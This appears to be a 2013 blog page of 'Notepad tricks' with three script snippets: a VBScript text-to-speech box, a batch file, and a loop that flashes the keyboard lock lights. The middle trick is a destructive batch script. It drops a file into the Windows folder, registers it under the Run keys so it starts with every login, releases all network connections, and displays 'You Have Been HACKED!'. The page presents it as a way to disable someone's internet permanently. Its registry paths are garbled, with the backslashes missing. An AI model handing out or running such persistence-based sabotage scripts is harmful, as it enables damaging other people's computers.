Les nouveautés et Tutoriels de Votre Codeur | SEO | Création de site web | Création de logiciel

Seo Master present to you:


This is a cool Notepad trick to convert any text message to voice format. Its working cool.



  • Open Notepad .

  • Copy and paste the below code :

Dim msg, sapi
msg=InputBox("Enter your text for conversion–www.entertainer001.blogspot.com","Entertainmnet Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

  • Save this file with any name with .vbs as extension.

For eg: “a.vbs”.





Enjoy…………..
2013, By: Seo Master
Seo Master present to you:


This is new trick to disable internet permanently in your computer. After it’s running you cannot use internet .


Copy below code and paste in Notepad.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save as like a .bat file.

                 eg:entertainer001.bat”.





..........................................END......................................... 
2013, By: Seo Master
Seo Master present to you:



This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!



Code No 1

This piece of code makes ur keyboard a live disco..
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
                                          
                                                      OR



Code No 2

This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop




Instructions:
  • Paste any of the two above codes in notepad

  • Save as “AnyFileName” .vbs and Run it.

  • To stop, launch task manager and then under “Processes” end “wscript.exe


I hope u would like it..


2013, By: Seo Master
Powered by Blogger.